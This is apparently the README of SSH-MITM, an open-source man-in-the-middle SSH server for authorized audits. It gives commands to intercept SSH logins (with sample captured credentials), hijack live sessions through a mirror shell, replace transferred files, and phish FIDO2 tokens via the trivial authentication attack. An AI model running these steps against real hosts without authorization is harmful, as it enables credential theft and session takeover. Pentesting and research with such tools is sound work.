ssh man-in-the-middle (ssh-mitm) server for security audits supporting
publickey authentication, session hijacking and file manipulation
Legal notice: SSH-MITM is intended for authorized security audits, penetration testing, and research only. Do not use it against systems you do not own or have explicit written permission to test. Unauthorized interception of SSH traffic may be illegal in your jurisdiction.
wget https://github.com/ssh-mitm/ssh-mitm/releases/latest/download/ssh-mitm-x86_64.AppImage
chmod +x ssh-mitm-x86_64.AppImage
./ssh-mitm-x86_64.AppImage server --remote-host <target-host>For other installation options (pip, Flatpak, Snap) see the Installation section below.
- Introduction
- Use Cases
- Features
- Installation
- Quickstart
- Session hijacking
- Phishing FIDO Tokens
- Contributing
- Contact
SSH-MITM is a man-in-the-middle SSH server for security audits and malware analysis.
Password and publickey authentication are supported. SSH-MITM can detect if a user is able to log in with publickey authentication on the remote server, allowing it to accept the same key as the destination server. If publickey authentication is not possible, it falls back to password authentication.
When publickey authentication is possible, a forwarded agent is needed to log in to the remote server. If no agent is forwarded, SSH-MITM can redirect the session to a honeypot.
- Penetration testing — audit SSH clients and servers in authorized engagements
- Security research — analyze SSH client behavior and authentication flows
- Training environments — demonstrate MITM attacks in controlled lab setups
- Malware analysis — inspect SSH traffic from suspicious clients in isolated environments
| Feature | Description |
|---|---|
| Publickey authentication | Accepts the same key as the destination server; detects and falls back to password auth |
| FIDO2 token phishing | Intercepts hardware token authentication via the trivial authentication attack (OpenSSH info) |
| Session hijacking | Mirror and interact with live SSH sessions in real time |
| File interception | Store and replace files during SCP/SFTP transfers |
| Port forwarding | TCP and dynamic forwarding with SOCKS 4/5 support |
| MOSH interception | Intercept MOSH connections |
| Client auditing | Check connecting clients against known vulnerabilities |
| Plugin support | Extend functionality with custom plugins |
- Linux (x86_64)
- Python 3.11 or newer (for pip installation)
No installation required — just download and run:
wget https://github.com/ssh-mitm/ssh-mitm/releases/latest/download/ssh-mitm-x86_64.AppImage
chmod +x ssh-mitm-x86_64.AppImageflatpak install flathub at.ssh_mitm.server
flatpak run at.ssh_mitm.serversudo snap install ssh-mitmpip install "ssh-mitm[production]"For more details, see the SSH-MITM installation guide.
Start SSH-MITM and point it at your target host (replace <target-host> with the SSH server you want to audit):
ssh-mitm server --remote-host <target-host>
SSH-MITM listens on port 10022 by default. Connect through the proxy:
ssh -p 10022 testuser@proxyserver
You will see the intercepted credentials in the log output:
INFO Remote authentication succeeded
Remote Address: 127.0.0.1:22
Username: testuser
Password: secret
Agent: no agent
When a client connects, SSH-MITM starts a mirror shell that can be used for session hijacking:
INFO ℹ created mirrorshell on port 34463. connect with: ssh -p 34463 127.0.0.1
Connect to the mirror shell with any SSH client:
ssh -p 34463 127.0.0.1
Commands executed in either the original or the hijacked session will be visible in both.
SSH-MITM is able to phish FIDO2 tokens which can be used for two-factor authentication.
The attack is called trivial authentication (CVE-2021-36367, CVE-2021-36368) and can be enabled with the command line argument --enable-trivial-auth:
ssh-mitm server --enable-trivial-auth
The attack is only performed when publickey login is possible, so password authentication continues to work normally.
Video explaining the phishing attack:
Click to view video on vimeo.com
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
- Fork the Project
- Create your Feature Branch (
git checkout -b feature/AmazingFeature) - Commit your Changes (
git commit -m 'Add some AmazingFeature') - Push to the Branch (
git push origin feature/AmazingFeature) - Open a Pull Request
- E-Mail: support@ssh-mitm.at
- Issue Tracker